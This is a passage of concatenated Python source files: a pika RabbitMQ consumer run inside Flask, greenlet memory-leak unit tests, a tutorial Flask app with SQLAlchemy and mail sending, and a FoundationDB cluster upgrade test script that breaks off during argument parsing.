"""Invoked by pika when RabbitMQ unexpectedly closes the channel.
Channels are usually closed if you attempt to do something that
violates the protocol, such as re-declare an exchange or queue with
different parameters. In this case, we'll close the connection
to shutdown the object.
:param pika.channel.Channel: The closed channel
:param int reply_code: The numeric reason the channel was closed
:param str reply_text: The text reason the channel was closed
"""
LOGGER.warning('Channel %i was closed: (%s) %s',
channel, reply_code, reply_text)
self._connection.close()
def setup_exchange(self, exchange_name):
"""Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC
command. When it is complete, the on_exchange_declareok method will
be invoked by pika.
:param str|unicode exchange_name: The name of the exchange to declare
"""
LOGGER.info('Declaring exchange %s', exchange_name)
self._channel.exchange_declare(self.on_exchange_declareok,
exchange_name,
self.EXCHANGE_TYPE)
def on_exchange_declareok(self, unused_frame):
"""Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC
command.
:param pika.Frame.Method unused_frame: Exchange.DeclareOk response frame
"""
LOGGER.info('Exchange declared')
self.setup_queue(self.QUEUE)
def setup_queue(self, queue_name):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
:param str|unicode queue_name: The name of the queue to declare.
"""
LOGGER.info('Declaring queue %s', queue_name)
self._channel.queue_declare(self.on_queue_declareok, queue_name)
def on_queue_declareok(self, method_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange together with the routing key by issuing the Queue.Bind
RPC command. When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
LOGGER.info('Binding %s to %s with %s',
self.EXCHANGE, self.QUEUE, self.ROUTING_KEY)
self._channel.queue_bind(self.on_bindok, self.QUEUE,
self.EXCHANGE, self.ROUTING_KEY)
def on_bindok(self, unused_frame):
"""Invoked by pika when the Queue.Bind method has completed. At this
point we will start consuming messages by calling start_consuming
which will invoke the needed RPC commands to start the process.
:param pika.frame.Method unused_frame: The Queue.BindOk response frame
"""
LOGGER.info('Queue bound')
self.start_consuming()
def start_consuming(self):
"""This method sets up the consumer by first calling
add_on_cancel_callback so that the object is notified if RabbitMQ
cancels the consumer. It then issues the Basic.Consume RPC command
which returns the consumer tag that is used to uniquely identify the
consumer with RabbitMQ. We keep the value to use it when we want to
cancel consuming. The on_message method is passed in as a callback pika
will invoke when a message is fully received.
"""
LOGGER.info('Issuing consumer related RPC commands')
self.add_on_cancel_callback()
self._consumer_tag = self._channel.basic_consume(self.on_message,
self.QUEUE)
def add_on_cancel_callback(self):
"""Add a callback that will be invoked if RabbitMQ cancels the consumer
for some reason. If RabbitMQ does cancel the consumer,
on_consumer_cancelled will be invoked by pika.
"""
LOGGER.info('Adding consumer cancellation callback')
self._channel.add_on_cancel_callback(self.on_consumer_cancelled)
def on_consumer_cancelled(self, method_frame):
"""Invoked by pika when RabbitMQ sends a Basic.Cancel for a consumer
receiving messages.
:param pika.frame.Method method_frame: The Basic.Cancel frame
"""
LOGGER.info('Consumer was cancelled remotely, shutting down: %r',
method_frame)
if self._channel:
self._channel.close()
def on_message(self, unused_channel, basic_deliver, properties, body):
"""Invoked by pika when a message is delivered from RabbitMQ. The
channel is passed for your convenience. The basic_deliver object that
is passed in carries the exchange, routing key, delivery tag and
a redelivered flag for the message. The properties passed in is an
instance of BasicProperties with the message properties and the body
is the message that was sent.
:param pika.channel.Channel unused_channel: The channel object
:param pika.Spec.Basic.Deliver: basic_deliver method
:param pika.Spec.BasicProperties: properties
:param str|unicode body: The message body
"""
LOGGER.info('Received message # %s from %s: %s',
basic_deliver.delivery_tag, properties.app_id, body)
#######
# I WAIT
#######
LOGGER.info("After consuming this message, I feel a bit lazy...sleeping for 1 second ヾ( ̄0 ̄ )ノ")
time.sleep(1)
self.acknowledge_message(basic_deliver.delivery_tag)
def acknowledge_message(self, delivery_tag):
"""Acknowledge the message delivery from RabbitMQ by sending a
Basic.Ack RPC method for the delivery tag.
:param int delivery_tag: The delivery tag from the Basic.Deliver frame
"""
LOGGER.info('Acknowledging message %s', delivery_tag)
self._channel.basic_ack(delivery_tag)
def stop_consuming(self):
"""Tell RabbitMQ that you would like to stop consuming by sending the
Basic.Cancel RPC command.
"""
if self._channel:
LOGGER.info('Sending a Basic.Cancel RPC command to RabbitMQ')
self._channel.basic_cancel(self.on_cancelok, self._consumer_tag)
def on_cancelok(self, unused_frame):
"""This method is invoked by pika when RabbitMQ acknowledges the
cancellation of a consumer. At this point we will close the channel.
This will invoke the on_channel_closed method once the channel has been
closed, which will in-turn close the connection.
:param pika.frame.Method unused_frame: The Basic.CancelOk frame
"""
LOGGER.info('RabbitMQ acknowledged the cancellation of the consumer')
self.close_channel()
def close_channel(self):
"""Call to close the channel with RabbitMQ cleanly by issuing the
Channel.Close RPC command.
"""
LOGGER.info('Closing the channel')
self._channel.close()
def run(self):
"""Run the example consumer by connecting to RabbitMQ and then
starting the IOLoop to block and allow the SelectConnection to operate.
"""
self._connection = self.connect()
thread = threading.Thread(target=self._connection.ioloop.start)
thread.setDaemon(True)
thread.start()
def stop(self):
"""Cleanly shutdown the connection to RabbitMQ by stopping the consumer
with RabbitMQ. When RabbitMQ confirms the cancellation, on_cancelok
        will be invoked by pika, which will then close the channel and
connection. The IOLoop is started again because this method is invoked
when CTRL-C is pressed raising a KeyboardInterrupt exception. This
exception stops the IOLoop which needs to be running for pika to
communicate with RabbitMQ. All of the commands issued prior to starting
the IOLoop will be buffered but not processed.
"""
LOGGER.info('Stopping')
self._closing = True
self.stop_consuming()
self._connection.ioloop.start()
LOGGER.info('Stopped')
def close_connection(self):
"""This method closes the connection to RabbitMQ."""
LOGGER.info('Closing connection')
self._connection.close()
def create_app():
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
# init app and config
application = Flask(__name__)
pika_consumer_qty = 20
LOGGER.info('Starting Example Consumers...')
pika_consumers = []
for i in range(0, pika_consumer_qty):
LOGGER.info('...' + str(i))
example_consumer = ExampleConsumer('amqp://guest:guest@localhost:5672/%2F')
example_consumer.run()
pika_consumers.append(example_consumer)
LOGGER.info('Done.')
# register hook to stop consumers on exit
def shutdown_consumers():
for consumer in pika_consumers:
LOGGER.info("Goodbye!")
consumer.stop()
atexit.register(shutdown_consumers)
return application
if __name__ == '__main__':
app = create_app()
app.run(debug=True, host='0.0.0.0')
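# A minimal standalone sketch (no Flask), assuming a local RabbitMQ with the default
# guest credentials; run() starts the IOLoop in a daemon thread, so the main thread
# only needs to stay alive until interrupted:
#
#   consumer = ExampleConsumer('amqp://guest:guest@localhost:5672/%2F')
#   consumer.run()
#   try:
#       while True:
#           time.sleep(1)
#   except KeyboardInterrupt:
#       consumer.stop()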
|
test_leaks.py
|
import unittest
import sys
import gc
import weakref
import greenlet
import threading
class ArgRefcountTests(unittest.TestCase):
def test_arg_refs(self):
args = ('a', 'b', 'c')
refcount_before = sys.getrefcount(args)
g = greenlet.greenlet(
lambda *args: greenlet.getcurrent().parent.switch(*args))
for i in range(100):
g.switch(*args)
self.assertEqual(sys.getrefcount(args), refcount_before)
def test_kwarg_refs(self):
kwargs = {}
g = greenlet.greenlet(
lambda **kwargs: greenlet.getcurrent().parent.switch(**kwargs))
for i in range(100):
g.switch(**kwargs)
self.assertEqual(sys.getrefcount(kwargs), 2)
if greenlet.GREENLET_USE_GC:
# These only work with greenlet gc support
def test_threaded_leak(self):
gg = []
def worker():
# only main greenlet present
gg.append(weakref.ref(greenlet.getcurrent()))
for i in range(2):
t = threading.Thread(target=worker)
t.start()
t.join()
del t
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertTrue(g() is None)
def test_threaded_adv_leak(self):
gg = []
def worker():
# main and additional *finished* greenlets
ll = greenlet.getcurrent().ll = []
def additional():
ll.append(greenlet.getcurrent())
for i in range(2):
greenlet.greenlet(additional).switch()
gg.append(weakref.ref(greenlet.getcurrent()))
for i in range(2):
t = threading.Thread(target=worker)
t.start()
t.join()
del t
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertTrue(g() is None)
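# A minimal sketch for running these leak tests directly with the standard unittest
# runner (the greenlet project normally drives them through its own test setup).
if __name__ == '__main__':
    unittest.main()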
|
hello.py
|
from flask import Flask, render_template, url_for, session, redirect, request
from flask_bootstrap import Bootstrap
from flask_script import Manager, Command, Shell
from flask_moment import Moment
from datetime import datetime
from flask_wtf import Form
from wtforms import StringField, BooleanField, SubmitField, PasswordField
from wtforms.validators import DataRequired, EqualTo
from wtforms.validators import Email as is_an_email_address
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask_mail import Mail, Message
from threading import Thread
import os
base_dir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SECRET_KEY'] = 'This is a very hard to guess key'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
os.path.join(base_dir, 'data.sqlite')
app.config['MAIL_SERVER'] = 'smtp.googlemail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['FLASK_ADMIN'] = os.environ.get('FLASK_ADMIN')
app.config['FLASK_SUBJECT_PREFIX'] = 'Flasky - '
app.config['MAIL_DEFAULT_SENDER'] = app.config['MAIL_USERNAME']
bootstrap = Bootstrap(app)
manager = Manager(app)
moment = Moment(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
mail = Mail(app)
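# send_mail renders the HTML and plain-text bodies from templates and hands the actual
# SMTP delivery to a background thread (async_send_mail), so the web request that
# triggered the mail is not blocked while the message is sent.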
def send_mail(to, subject, template, **kwargs):
msg = Message(app.config['FLASK_SUBJECT_PREFIX'] + subject, recipients=[to])
msg.html = render_template(template + '.html', **kwargs)
msg.body = render_template(template + '.txt', **kwargs)
thr = Thread(target=async_send_mail, name='send_mail', args=(app, msg))
thr.start()
return thr
def async_send_mail(app, msg):
with app.app_context():
mail.send(msg)
class NameForm(Form):
# email = StringField("Please input your email.", validators=[DataRequired(),
# is_an_email_address()])
# password = PasswordField("Input your password.", validators=[DataRequired(),
# EqualTo('password_confirm', "The password looks like not the same.")])
# password_confirm = PasswordField("Confirm your password.", validators=[
# DataRequired()])
username = StringField("Please input your name.", validators=[DataRequired()])
submit = SubmitField("Submit")
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(64), unique=True)  # role names ('Administrator', etc.) are strings
users = db.relationship('User', backref='role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = ['Administrator', 'Moderator', 'User']
for role in roles:
r = Role.query.filter_by(name=role).first()
if r is None:
r = Role(name=role)
db.session.add(r)
db.session.commit()
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
@app.route('/', methods=['GET', 'POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is None:
session['known'] = False
user = User(username=form.username.data)
db.session.add(user)
db.session.commit()
send_mail(app.config['FLASK_ADMIN'], 'New user', 'new_user', user=user)
else:
session['known'] = True
session['username'] = form.username.data
form.username.data = ''
return redirect(url_for('index'))
return render_template('index.html', form=form, known=session.get('known', False),
username=session.get('username'))
@app.route('/user/<username>')
def user(username):
return render_template('user.html', username=username)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
def make_shell_context():
return dict(app=app, db=db, User=User, Role=Role)
manager.add_command('shell', Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
|
upgrade_test.py
|
#!/usr/bin/env python3
from argparse import ArgumentParser, RawDescriptionHelpFormatter
import glob
import os
from pathlib import Path
import platform
import random
import shutil
import stat
import subprocess
import sys
from threading import Thread, Event
import traceback
import time
from urllib import request
import hashlib
from local_cluster import LocalCluster, random_secret_string
SUPPORTED_PLATFORMS = ["x86_64"]
SUPPORTED_VERSIONS = [
"7.2.0",
"7.1.5",
"7.1.4",
"7.1.3",
"7.1.2",
"7.1.1",
"7.1.0",
"7.0.0",
"6.3.24",
"6.3.23",
"6.3.22",
"6.3.18",
"6.3.17",
"6.3.16",
"6.3.15",
"6.3.13",
"6.3.12",
"6.3.9",
"6.2.30",
"6.2.29",
"6.2.28",
"6.2.27",
"6.2.26",
"6.2.25",
"6.2.24",
"6.2.23",
"6.2.22",
"6.2.21",
"6.2.20",
"6.2.19",
"6.2.18",
"6.2.17",
"6.2.16",
"6.2.15",
"6.2.10",
"6.1.13",
"6.1.12",
"6.1.11",
"6.1.10",
"6.0.18",
"6.0.17",
"6.0.16",
"6.0.15",
"6.0.14",
"5.2.8",
"5.2.7",
"5.1.7",
"5.1.6",
]
CLUSTER_ACTIONS = ["wiggle"]
FDB_DOWNLOAD_ROOT = "https://github.com/apple/foundationdb/releases/download/"
LOCAL_OLD_BINARY_REPO = "/opt/foundationdb/old/"
CURRENT_VERSION = "7.2.0"
HEALTH_CHECK_TIMEOUT_SEC = 5
PROGRESS_CHECK_TIMEOUT_SEC = 30
TESTER_STATS_INTERVAL_SEC = 5
TRANSACTION_RETRY_LIMIT = 100
MAX_DOWNLOAD_ATTEMPTS = 5
RUN_WITH_GDB = False
def make_executable_path(path):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def remove_file_no_fail(filename):
try:
os.remove(filename)
except OSError:
pass
def version_from_str(ver_str):
ver = [int(s) for s in ver_str.split(".")]
assert len(ver) == 3, "Invalid version string {}".format(ver_str)
return ver
def api_version_from_str(ver_str):
ver_tuple = version_from_str(ver_str)
return ver_tuple[0] * 100 + ver_tuple[1] * 10
def version_before(ver_str1, ver_str2):
return version_from_str(ver_str1) < version_from_str(ver_str2)
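# A quick illustration of the version helpers above (values are arbitrary and
# not used by the test itself): "7.1.5" maps to API version 710, and
# version_before() compares versions numerically rather than lexically.
def _version_helpers_example():
    assert api_version_from_str("7.1.5") == 710
    assert api_version_from_str("6.3.24") == 630
    assert version_before("6.3.24", "7.1.0")
    assert not version_before("7.1.0", "7.0.0")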
def random_sleep(min_sec, max_sec):
time_sec = random.uniform(min_sec, max_sec)
print("Sleeping for {0:.3f}s".format(time_sec))
time.sleep(time_sec)
def compute_sha256(filename):
hash_function = hashlib.sha256()
with open(filename, "rb") as f:
while True:
data = f.read(128 * 1024)
if not data:
break
hash_function.update(data)
return hash_function.hexdigest()
def read_to_str(filename):
with open(filename, "r") as f:
return f.read()
class UpgradeTest:
def __init__(
self,
args
):
self.build_dir = Path(args.build_dir).resolve()
assert self.build_dir.exists(), "{} does not exist".format(args.build_dir)
assert self.build_dir.is_dir(), "{} is not a directory".format(args.build_dir)
self.upgrade_path = args.upgrade_path
self.used_versions = set(self.upgrade_path).difference(set(CLUSTER_ACTIONS))
for version in self.used_versions:
assert version in SUPPORTED_VERSIONS, "Unsupported version or cluster action {}".format(version)
self.platform = platform.machine()
assert self.platform in SUPPORTED_PLATFORMS, "Unsupported platform {}".format(
self.platform
)
self.tmp_dir = self.build_dir.joinpath("tmp", random_secret_string(16))
self.tmp_dir.mkdir(parents=True)
self.download_dir = self.build_dir.joinpath("tmp", "old_binaries")
self.local_binary_repo = Path(LOCAL_OLD_BINARY_REPO)
if not self.local_binary_repo.exists():
self.local_binary_repo = None
self.download_old_binaries()
self.create_external_lib_dir()
init_version = self.upgrade_path[0]
self.cluster = LocalCluster(
self.tmp_dir,
self.binary_path(init_version, "fdbserver"),
self.binary_path(init_version, "fdbmonitor"),
self.binary_path(init_version, "fdbcli"),
args.process_number,
create_config=False,
redundancy=args.redundancy
)
self.cluster.create_cluster_file()
self.configure_version(init_version)
self.log = self.cluster.log
self.etc = self.cluster.etc
self.data = self.cluster.data
self.input_pipe_path = self.tmp_dir.joinpath(
"input.{}".format(random_secret_string(8))
)
self.output_pipe_path = self.tmp_dir.joinpath(
"output.{}".format(random_secret_string(8))
)
os.mkfifo(self.input_pipe_path)
os.mkfifo(self.output_pipe_path)
self.progress_event = Event()
self.api_version = None
self.tester_retcode = None
self.tester_proc = None
self.output_pipe = None
self.tester_bin = None
self.ctrl_pipe = None
# Check if the binaries for the given version are available in the local old binaries repository
def version_in_local_repo(self, version):
return (self.local_binary_repo is not None) and (self.local_binary_repo.joinpath(version).exists())
def binary_path(self, version, bin_name):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("bin", bin_name)
elif self.version_in_local_repo(version):
return self.local_binary_repo.joinpath(version, "bin", "{}-{}".format(bin_name, version))
else:
return self.download_dir.joinpath(version, bin_name)
def lib_dir(self, version):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("lib")
else:
return self.download_dir.joinpath(version)
# Download an old binary of a given version from a remote repository
def download_old_binary(
self, version, target_bin_name, remote_bin_name, make_executable
):
local_file = self.download_dir.joinpath(version, target_bin_name)
if local_file.exists():
return
# Download to a temporary file and then replace the target file atomically
        # to avoid consistency errors in case multiple tests are downloading the
# same file in parallel
local_file_tmp = Path("{}.{}".format(str(local_file), random_secret_string(8)))
self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True)
remote_file = "{}{}/{}".format(FDB_DOWNLOAD_ROOT, version, remote_bin_name)
remote_sha256 = "{}.sha256".format(remote_file)
local_sha256 = Path("{}.sha256".format(local_file_tmp))
for attempt_cnt in range(MAX_DOWNLOAD_ATTEMPTS + 1):
if attempt_cnt == MAX_DOWNLOAD_ATTEMPTS:
assert False, "Failed to download {} after {} attempts".format(
local_file_tmp, MAX_DOWNLOAD_ATTEMPTS
)
try:
print("Downloading '{}' to '{}'...".format(remote_file, local_file_tmp))
request.urlretrieve(remote_file, local_file_tmp)
print("Downloading '{}' to '{}'...".format(remote_sha256, local_sha256))
request.urlretrieve(remote_sha256, local_sha256)
print("Download complete")
except Exception as e:
print("Retrying on error:", e)
continue
assert local_file_tmp.exists(), "{} does not exist".format(local_file_tmp)
assert local_sha256.exists(), "{} does not exist".format(local_sha256)
expected_checksum = read_to_str(local_sha256)
            actual_checksum = compute_sha256(local_file_tmp)
            if expected_checksum == actual_checksum:
print("Checksum OK")
break
print(
"Checksum mismatch. Expected: {} Actual: {}".format(
                    expected_checksum, actual_checksum
)
)
os.rename(local_file_tmp, local_file)
os.remove(local_sha256)
if make_executable:
make_executable_path(local_file)
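    # A minimal sketch of the download-then-atomic-rename pattern used above,
    # with hypothetical names and stripped of the retry/checksum handling:
    #
    #   tmp = "{}.{}".format(dest, random_secret_string(8))  # unique temp name
    #   request.urlretrieve(url, tmp)                         # possibly run by several tests at once
    #   os.rename(tmp, dest)                                  # atomic within one filesystem
    #
    # Because os.rename() replaces the destination atomically on POSIX,
    # concurrent test runs never observe a half-written binary.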
# Copy a client library file from the local old binaries repository
# The file needs to be renamed to libfdb_c.so, because it is loaded with this name by fdbcli
def copy_clientlib_from_local_repo(self, version):
dest_lib_file = self.download_dir.joinpath(version, "libfdb_c.so")
if dest_lib_file.exists():
return
# Avoid race conditions in case of parallel test execution by first copying to a temporary file
# and then renaming it atomically
dest_file_tmp = Path("{}.{}".format(str(dest_lib_file), random_secret_string(8)))
src_lib_file = self.local_binary_repo.joinpath(version, "lib", "libfdb_c-{}.so".format(version))
assert src_lib_file.exists(), "Missing file {} in the local old binaries repository".format(src_lib_file)
self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True)
shutil.copyfile(src_lib_file, dest_file_tmp)
os.rename(dest_file_tmp, dest_lib_file)
assert dest_lib_file.exists(), "{} does not exist".format(dest_lib_file)
# Download all old binaries required for testing the specified upgrade path
def download_old_binaries(self):
for version in self.used_versions:
if version == CURRENT_VERSION:
continue
if self.version_in_local_repo(version):
self.copy_clientlib_from_local_repo(version)
continue
self.download_old_binary(
version, "fdbserver", "fdbserver.{}".format(self.platform), True
)
self.download_old_binary(
version, "fdbmonitor", "fdbmonitor.{}".format(self.platform), True
)
self.download_old_binary(
version, "fdbcli", "fdbcli.{}".format(self.platform), True
)
self.download_old_binary(
version, "libfdb_c.so", "libfdb_c.{}.so".format(self.platform), False
)
# Create a directory for external client libraries for MVC and fill it
# with the libraries necessary for the specified upgrade path
def create_external_lib_dir(self):
self.external_lib_dir = self.tmp_dir.joinpath("client_libs")
self.external_lib_dir.mkdir(parents=True)
for version in self.used_versions:
src_file_path = self.lib_dir(version).joinpath("libfdb_c.so")
assert src_file_path.exists(), "{} does not exist".format(src_file_path)
target_file_path = self.external_lib_dir.joinpath(
"libfdb_c.{}.so".format(version)
)
shutil.copyfile(src_file_path, target_file_path)
# Perform a health check of the cluster: Use fdbcli status command to check if the number of
# server processes and their versions are as expected
def health_check(self, timeout_sec=HEALTH_CHECK_TIMEOUT_SEC):
retries = 0
while retries < timeout_sec:
retries += 1
status = self.cluster.get_status()
if "processes" not in status["cluster"]:
print("Health check: no processes found. Retrying")
time.sleep(1)
continue
num_proc = len(status["cluster"]["processes"])
if num_proc != self.cluster.process_number:
print(
"Health check: {} of {} processes found. Retrying".format(
num_proc, self.cluster.process_number
)
)
time.sleep(1)
continue
for (_, proc_stat) in status["cluster"]["processes"].items():
proc_ver = proc_stat["version"]
assert (
proc_ver == self.cluster_version
), "Process version: expected: {}, actual: {}".format(
self.cluster_version, proc_ver
)
print("Health check: OK")
return
assert False, "Health check: Failed"
# Create and save a cluster configuration for the given version
def configure_version(self, version):
self.cluster.fdbmonitor_binary = self.binary_path(version, "fdbmonitor")
self.cluster.fdbserver_binary = self.binary_path(version, "fdbserver")
self.cluster.fdbcli_binary = self.binary_path(version, "fdbcli")
self.cluster.set_env_var = "LD_LIBRARY_PATH", self.lib_dir(version)
if version_before(version, "7.1.0"):
self.cluster.use_legacy_conf_syntax = True
self.cluster.save_config()
self.cluster_version = version
# Upgrade the cluster to the given version
def upgrade_to(self, version):
print("Upgrading to version {}".format(version))
self.cluster.stop_cluster()
self.configure_version(version)
self.cluster.ensure_ports_released()
self.cluster.start_cluster()
print("Upgraded to {}".format(version))
def __enter__(self):
print("Starting cluster version {}".format(self.cluster_version))
self.cluster.start_cluster()
self.cluster.create_database(enable_tenants=False)
return self
    def __exit__(self, exc_type, exc_value, exc_traceback):
self.cluster.stop_cluster()
shutil.rmtree(self.tmp_dir)
# Determine FDB API version matching the upgrade path
def determine_api_version(self):
self.api_version = api_version_from_str(CURRENT_VERSION)
for version in self.used_versions:
self.api_version = min(api_version_from_str(version), self.api_version)
# Start the tester to generate the workload specified by the test file
def exec_workload(self, test_file):
self.tester_retcode = 1
try:
self.determine_api_version()
cmd_args = [
self.tester_bin,
"--cluster-file",
self.cluster.cluster_file,
"--test-file",
test_file,
"--external-client-dir",
self.external_lib_dir,
"--disable-local-client",
"--input-pipe",
self.input_pipe_path,
"--output-pipe",
self.output_pipe_path,
"--api-version",
str(self.api_version),
"--log",
"--log-dir",
self.log,
"--tmp-dir",
self.tmp_dir,
"--transaction-retry-limit",
str(TRANSACTION_RETRY_LIMIT),
"--stats-interval",
str(TESTER_STATS_INTERVAL_SEC*1000)
]
if RUN_WITH_GDB:
cmd_args = ["gdb", "-ex", "run", "--args"] + cmd_args
print(
"Executing test command: {}".format(
" ".join([str(c) for c in cmd_args])
)
)
self.tester_proc = subprocess.Popen(
cmd_args, stdout=sys.stdout, stderr=sys.stderr
)
self.tester_retcode = self.tester_proc.wait()
self.tester_proc = None
if self.tester_retcode != 0:
print("Tester failed with return code {}".format(self.tester_retcode))
except Exception:
print("Execution of test workload failed")
print(traceback.format_exc())
finally:
# If the tester failed to initialize, other threads of the test may stay
# blocked on trying to open the named pipes
if self.ctrl_pipe is None or self.output_pipe is None:
print("Tester failed before initializing named pipes. Aborting the test")
os._exit(1)
# Perform a progress check: Trigger it and wait until it is completed
def progress_check(self):
self.progress_event.clear()
os.write(self.ctrl_pipe, b"CHECK\n")
self.progress_event.wait(None if RUN_WITH_GDB else PROGRESS_CHECK_TIMEOUT_SEC)
if self.progress_event.is_set():
print("Progress check: OK")
else:
assert False, "Progress check failed after upgrade to version {}".format(
self.cluster_version
)
# The main function of a thread for reading and processing
# the notifications received from the tester
def output_pipe_reader(self):
try:
print("Opening pipe {} for reading".format(self.output_pipe_path))
self.output_pipe = open(self.output_pipe_path, "r")
for line in self.output_pipe:
msg = line.strip()
print("Received {}".format(msg))
if msg == "CHECK_OK":
self.progress_event.set()
self.output_pipe.close()
except Exception as e:
print("Error while reading output pipe", e)
print(traceback.format_exc())
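    # Control protocol over the two named pipes (see progress_check above and
    # exec_upgrade_test below): this script writes "CHECK\n" or "STOP\n" to the
    # input pipe, and the tester acknowledges progress by writing "CHECK_OK" to
    # the output pipe, which sets progress_event. A hypothetical tester-side
    # counterpart would look roughly like:
    #
    #   with open(input_pipe_path) as ctrl, open(output_pipe_path, "w") as out:
    #       for cmd in ctrl:
    #           if cmd.strip() == "CHECK" and workload_made_progress():  # hypothetical check
    #               out.write("CHECK_OK\n")
    #               out.flush()
    #           elif cmd.strip() == "STOP":
    #               break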
# Execute the upgrade test workflow according to the specified
# upgrade path: perform the upgrade steps and check success after each step
def exec_upgrade_test(self):
print("Opening pipe {} for writing".format(self.input_pipe_path))
self.ctrl_pipe = os.open(self.input_pipe_path, os.O_WRONLY)
try:
self.health_check()
self.progress_check()
random_sleep(0.0, 2.0)
for entry in self.upgrade_path[1:]:
if entry == "wiggle":
self.cluster.cluster_wiggle()
else:
assert entry in self.used_versions, "Unexpected entry in the upgrade path: {}".format(entry)
self.upgrade_to(entry)
self.health_check()
self.progress_check()
os.write(self.ctrl_pipe, b"STOP\n")
finally:
os.close(self.ctrl_pipe)
# Kill the tester process if it is still alive
def kill_tester_if_alive(self, workload_thread):
if not workload_thread.is_alive():
return
if self.tester_proc is not None:
try:
print("Killing the tester process")
self.tester_proc.kill()
workload_thread.join(5)
except Exception:
print("Failed to kill the tester process")
# The main method implementing the test:
# - Start a thread for generating the workload using a tester binary
# - Start a thread for reading notifications from the tester
# - Trigger the upgrade steps and checks in the main thread
def exec_test(self, args):
self.tester_bin = self.build_dir.joinpath("bin", "fdb_c_api_tester")
assert self.tester_bin.exists(), "{} does not exist".format(self.tester_bin)
self.tester_proc = None
test_retcode = 1
try:
workload_thread = Thread(target=self.exec_workload, args=(args.test_file,))
workload_thread.start()
reader_thread = Thread(target=self.output_pipe_reader)
reader_thread.start()
self.exec_upgrade_test()
test_retcode = 0
except Exception:
print("Upgrade test failed")
print(traceback.format_exc())
self.kill_tester_if_alive(workload_thread)
finally:
workload_thread.join(5)
reader_thread.join(5)
self.kill_tester_if_alive(workload_thread)
if test_retcode == 0:
test_retcode = self.tester_retcode
return test_retcode
def grep_logs_for_events(self, severity):
return (
subprocess.getoutput(
"grep -r 'Severity=\"{}\"' {}".format(
severity, self.cluster.log.as_posix()
)
)
.rstrip()
.splitlines()
)
# Check the cluster log for errors
def check_cluster_logs(self, error_limit=100):
sev40s = (
subprocess.getoutput(
"grep -r 'Severity=\"40\"' {}".format(self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
err_cnt = 0
for line in sev40s:
# When running ASAN we expect to see this message. Boost coroutine should be using the
# correct asan annotations so that it shouldn't produce any false positives.
if line.endswith(
"WARNING: ASan doesn't fully support makecontext/swapcontext functions and may produce false "
"positives in some cases! "
):
continue
if err_cnt < error_limit:
print(line)
err_cnt += 1
if err_cnt > 0:
            print(
                ">>>>>>>>>>>>>>>>>>>> Found {} severity 40 events - the test fails".format(
                    err_cnt
                )
            )
else:
print("No errors found in logs")
return err_cnt == 0
# Check the server and client logs for warnings and dump them
def dump_warnings_in_logs(self, limit=100):
sev30s = (
subprocess.getoutput(
"grep -r 'Severity=\"30\"' {}".format(self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
if len(sev30s) == 0:
print("No warnings found in logs")
else:
print(
">>>>>>>>>>>>>>>>>>>> Found {} severity 30 events (warnings):".format(
len(sev30s)
)
)
for line in sev30s[:limit]:
print(line)
# Dump the last cluster configuration and cluster logs
def dump_cluster_logs(self):
for etc_file in glob.glob(os.path.join(self.cluster.etc, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(etc_file))
with open(etc_file, "r") as f:
print(f.read())
for log_file in glob.glob(os.path.join(self.cluster.log, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(log_file))
with open(log_file, "r") as f:
print(f.read())
if __name__ == "__main__":
parser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
description="""
A script for testing FDB multi-version client in upgrade scenarios. Creates a local cluster,
generates a workload using fdb_c_api_tester with a specified test file, and performs
cluster upgrade according to the specified upgrade path. Checks if the workload successfully
progresses after each upgrade step.
""",
)
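    # Example invocation (hypothetical paths; the flags are defined below):
    #   ./upgrade_test.py --build-dir ./build --test-file tests/upgrade.toml \
    #       --upgrade-path 6.3.24 7.1.5 wiggle 7.2.0 --process-number 3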
parser.add_argument(
"--build-dir",
"-b",
metavar="BUILD_DIRECTORY",
help="FDB build directory",
required=True,
)
parser.add_argument(
"--upgrade-path",
nargs="+",
help="Cluster upgrade path: a space separated list of versions.\n" +
"The list may also contain cluster change actions: {}".format(CLUSTER_ACTIONS),
default=[CURRENT_VERSION],
)
parser.add_argument(
"--test-file",
help="A .toml file describing a test workload to be generated with fdb_c_api_tester",
required=True,
)
parser.add_argument(
"--process-number",
"-p",
help="Number of fdb processes running (default: 0 - random)",
